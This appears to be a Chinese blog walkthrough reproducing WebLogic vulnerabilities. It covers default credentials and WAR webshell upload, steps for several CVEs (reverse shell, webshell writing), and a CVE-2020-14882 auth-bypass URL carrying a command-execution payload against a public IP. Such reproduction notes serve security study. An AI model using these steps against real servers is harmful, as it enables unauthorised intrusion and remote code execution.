当前位置: 首页 > news >正文

WebLogic 漏洞复现

1、后台弱⼝令GetShell

默认账号密码:weblogic/Oracle@123

weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic

这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。

http://47.121.212.195:7001/console

2、登录后台后,点击部署,点击安装,点击上传⽂件。

3、上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

一直点击下一步

4、使用工具进行连接

2、CVE-2017-3506

1、验证是否存在wls-wsat组件

http://47.121.212.195:7001/wls-wsat/CoordinatorPortType

2、在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。

3、CVE-2019-2725

1、http://47.121.212.195:7001/_async/AsyncResponseService  

2、在当前⻚⾯抓包 , 修改请求包 , 写⼊shell

3、访问下载到weblogic服务器上的⽊⻢,进⾏连接

4、CVE-2018-2628

1、

2、直接使⽤利⽤工具

5、CVE-2018-2894

1、这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password

 2、设置Web服务测试开启

域结构 -> base-domain -> ⾼级 -> 启动Web服务测试页

3、点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录

http://47.121.212.195:7001/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4、点击安全 , 点击添加

5、打开控制台, 找到对应时间戳

 

6、Webshell连接

6、CVE-2020-14882

1、访问管理控制台

2、使⽤以下url绕过登录认证

http://47.121.212.195:7001/console/css/%252e%252e%252fconsole.portal

3、⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
http://47.121.212.195:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")

相关文章:

  • 【鸿蒙】HarmonyOS NEXT开发快速入门教程之ArkTS语法装饰器(上)
  • [ffmpeg] packet
  • rabbitmq整合skywalking并编写自定义插件增强
  • .netCore运行的环境WindowsHosting和dotnet-sdk区别
  • 2024个人简历模板免费可编辑,可能是整理最全的简历(支持Word格式下载)
  • 【C#生态园】一文详解:NHibernate、Entity Framework Core、Dapper 等 .NET ORM 框架优劣对比
  • 使用Django 搭建自动化平台
  • 卷积神经网络
  • es由一个集群迁移到另外一个集群es的数据迁移
  • Vue使用Vue Router路由:通过URL传递与获取参数
  • 自动化测试概念篇
  • 【ARM】A64指令介绍及内存屏障和寄存器
  • 《拿下奇怪的前端报错》:nvm不可用报错`GLIBC_2.27‘‘GLIBCXX_3.4.20‘not Found?+ 使用docker构建多个前端项目实践
  • 3.2 USART 通用同步/异步收发器
  • ELK日志分析系统
  • 50页PPT麦肯锡精益运营转型五步法
  • 蓝桥杯2024省C
  • 基于DeepFace深度学习模型的离线版人脸识别API接口实现(类似百度在线API接口)
  • Qt clicked()、clicked(bool)、toggled(bool)信号的区别和联系
  • 轻型DXF文件格式
  • 安徽省委副秘书长、省委政研室主任余三元调任省社科院院长
  • 茅台1935今年动销达到预期,暂无赴港上市计划!茅台业绩会回应多个热点
  • “无锡景・江南韵”:中国评弹艺术在尼日利亚收获众多粉丝
  • 金俊峰已跨区任上海金山区委副书记
  • 年轻小将绽放光芒!中国短跑男女接力队直通东京世锦赛
  • 浙江省机电集团党委书记、董事长廉俊接受审查调查